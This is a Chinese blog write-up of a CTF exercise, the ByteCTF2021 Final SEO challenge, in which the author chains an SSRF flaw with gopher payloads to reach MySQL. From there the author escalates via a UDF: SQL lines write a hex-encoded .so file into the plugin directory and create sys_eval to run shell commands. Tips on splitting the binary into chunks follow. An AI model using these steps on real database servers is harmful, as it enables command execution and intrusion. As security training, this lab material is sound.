记一次SSRF练习

最新推荐文章于 2022-07-09 11:37:08 发布
最新推荐文章于 2022-07-09 11:37:08 发布
阅读量4.2k 收藏 3
点赞数 3
分类专栏: CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/122154717
版权

记一次SSRF练习


老表发我一个SSRF的CTF题,感觉还不错,还能练习下SSRF挖掘技巧,权作学习记录。

审题

环境搭建:

git clone https://github.com/sqlsec/ByteCTF2021-Final-SEO.git
cd ByteCTF2021-Final-SEO/Dockerfile
docker-compose up -d

docker搭建好基本上就是一个seo站长工具界面,撸了一遍接口发现如下接口存在漏洞。

image-20211219225804012

做题

image-20211219225930395

到这基本上就确定SSRF点了,不过这个是我测试方法,一般情况下还要测试下外网域名是否能够访问。

从info.php确定主机内网IP:172.73.23.21,之后就可以进行内网扫描。这个站点还有一个文件下载,能够造成任意文件读取,很有必要的,查看内网的一些信息(proc/net/arp)。

image-20211219230814303

这个还是比较好的一个点,如果有该主机的话就会有mac地址信息。之后用dict进行端口扫描,发现3306端口。

查看info.php可知使用了gopher协议,直接使用工具生成查询语句测试,注意二次URL编码。

image-20211219231732614

image-20211219231932272

后续进行UDF提权,几个命令如下:

#查看主机版本及架构
show variables like '%compile%';
#查看 plugin 目录(/usr/lib/mysql/plugin/)
show variables like 'plugin%';              
SELECT 0x7f454c460201010000000.......00000 INTO DUMPFILE '/usr/lib/mysql/udf.so';
#创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';         
select sys_eval('cat /flag');

交卷

image-20211221121112016

经验总结

1.UDF提权过程中,系统环境可能不同,数据库版本可能不同,需要注意。

2.dll,so文件获取可以在kali的路径/usr/share/metasploit-framework/data/exploits/mysql/下获取。

3.gopherus在使用过程中要注意,不同的系统窗口复制粘贴可能大小限制,数据过长可以直接修改gopherus,避免row_input传参。

4.插入数据过程中有限制的话可以使用如下语句拼接:

create table temp(data longblob);
insert into temp(data) values (0x4d5a9000......);
update temp set data = concat(data,0x33c2e......);
select data from temp into dumpfile '/usr/lib/mysql/plugin/udf.so';

5.udf提权只能创建so库里有的函数,不能随意命名,可以使用objdump -tT lib_mysqludf_sys_64.so查看。

痴人说梦梦中人
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
8月3日ssrf漏洞解析训练
slc3315的博客
08-03 786
第一题 题目: 思路: 点击logo获取如下界面 分析: 本题链接暴漏两个问题,一是flag.php在根目录下(原因前面的index.php就在根目录下,一般的话两者在同一目录下);二是img参数(因此需要构造对应的img链接,然后形成破损图片并保存) 步骤一: 构造payload: http://39.71.44.204:21029/index.php?img=Http://127.0.0.1/flag.php 找到图片源 新建窗口打开 地址: http://39.71.44.204:21029
一次偶然的SSRF漏洞挖掘与测试
不想当脚本小子的脚本小子
03-24 344
打开界面是一个注册界面 提交注册后抓包:
一次使用burp挖掘ssrf的src过程
帅醉了的博客
04-16 906
将存在可疑的链接的包通过burp抓下 应为没有写链接,发现跳转404 使用burp生成poc,复制此地址 输入构造好的payload,成功跳转到burp的页面 危害:可以进行钓鱼,访问恶意网站等 ...
深入了解ssrf(实践练习)上
qq_62046696的博客
07-04 865
ctfhub直接访问127.0.0.1/flag.php即可 伪协议:事实上是其支持的协议与封装协议。而其支持的部分协议有: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams)查看源码即可 3.端口扫描(burp爆破)进去以后send to intruder 然后GET /?url=127.0.0.1:§8
一次简单的PHP代码审计(SSRF案例)
weixin_30587927的博客
08-08 595
题目链接: http://oj.momomoxiaoxi.com:9090/ 用dirsearch对网址进行扫描,发现robots.txt 命令行: python3 dirsearch.py -u "http://oj.momomoxiaoxi.com:9090/" -e * 于是输入网址打开这个文件: http://oj.momomoxiaoxi.com:909...
第一节 SSRF原理介绍-01
最新发布
09-15
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: SSRF漏洞定义是指...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
Pikachu之SSRF解题
Bird&Bird
07-03 270
目录SSRF(curl)SSRF(file_get_content) SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: f
SSRF学习 2
weixin_63231007的博客
05-21 855
[CTFHub]ssrf 上传文件&Fastcgi&Redis&bypass
SSRF测试(Server Side Request Forgery)(owasp)
qq_1062290728的博客
03-14 819
原文 概述 web应用经常与内部或外部资源进行交互。虽然你可能期望只有预期的资源才能处理你发送的数据,然而处理不当的数据可能产生注入攻击。其中一种注入攻击是ssrf。一个成功的ssrf攻击能够授予攻击者访问内部服务、访问内部文件、执行受限操作的权限。在一些情况下,它甚至导致RCE。 测试目标 确认ssrf注入点 测试注入点是否可利用 评估漏洞的严重程度 如何测试 当测试ssrf时,你试图使目标服务器无意中加载或报错可能是恶意的内容。最常见的测试是本地和远程文件包含。ssrf还有另一方面:一种信任关系。通
WordPress 4.4 SSRF
乐枕的家
08-22 2770
通过这个漏洞熟悉一下WP的代码。数据跟踪[xmlrpc.php] 获取POST的数据$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );创建xmlrpc_server,使用serve_request()方法处理输入。$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_cl
渗透测试之SSRF
Hi~ 土拨鼠
12-29 1797
文章目录服务端请求伪造概述危害产生SSRF 漏洞的代码file_get_contents()函数curl_exec()函数利用访问正常的文件端口扫描(扫描内网的机器)读取系统本地文件内网Web 应用指纹识别攻击内网应用Weblogic 从SSRF 到redis 未授权访问到getShell利用redis 反弹ShellSSRF 漏洞挖掘防御 服务端请求伪造 SSRF (Server-side Request Forgery,服务器端请求伪造)是一种攻击者发起的伪造由服务器端发起请求的一种攻击,也是常见web
【漏洞学习——SSRF】bilibili某分站从信息泄露到ssrf再到命令执行
Fly_鹏程万里
02-22 969
漏洞细节 这个只是memcache的案例,如果是redis更好利用了0x00 前言 扫描器时常会扫描到一些信息泄露,如discuz的配置文件 /config/config_global.php~  里面时常带有数据库密码等,但又苦于内网,十分尴尬。0x01 个例分析 以bilibili这个为例 http://bbs.biligame.com/config/config_global.php~  ...
ByteCTF 2021(Crypto部分)
m0_57291352的博客
10-24 722
easyxor 核心加密算法convert就是四个shift,写个逆就行,flag被分为两部分,前半部分用OFB模式加密,后半部分用CBC模式加密,由于CBC模式的缺陷,当我们只考虑最后一块时,将倒数第二块作为iv,凭借flag的格式做判断即可爆破出key,再利用OFB模式的漏洞,结合key与已知的flag格式即可逆推出iv,此时iv和key尽知,直接解密即可 from Crypto.Util.number import bytes_to_long, long_to_bytes from random im
攻防世界题目练习--MISC新手关(1~6)
qq_40490088的博客
10-19 6409
练习地址:https://adworld.xctf.org.cn/ 题目1:this_is_flag 题目描述:Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 解决: 只需要把example里的内容复制进去就可以。 题目2:ext3 题目描述:今天是菜狗的生日,他收到了一个li...
攻防世界—MISC 新手区1-12
m0_62063669的博客
07-09 836
1.this_is_flag2.pdf3.如来十三掌4.give_you_flag5.stegano6.坚持60s7.gif8.掀桌子9.ext310.SimpleRAR11.base64stego12.功夫再高也怕菜刀 题目描述:菜猫给了菜狗一张图,说图下面什么都没有下载附件,是一个pdf文件,里面有一张图片,鼠标移动,发现眼睛位置附近出现 文字输入光标,全部选中复制出来就是flag flag{security_through_obscurity}题目描述:菜狗为了打败菜猫,学了一套如来十三掌。下..
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值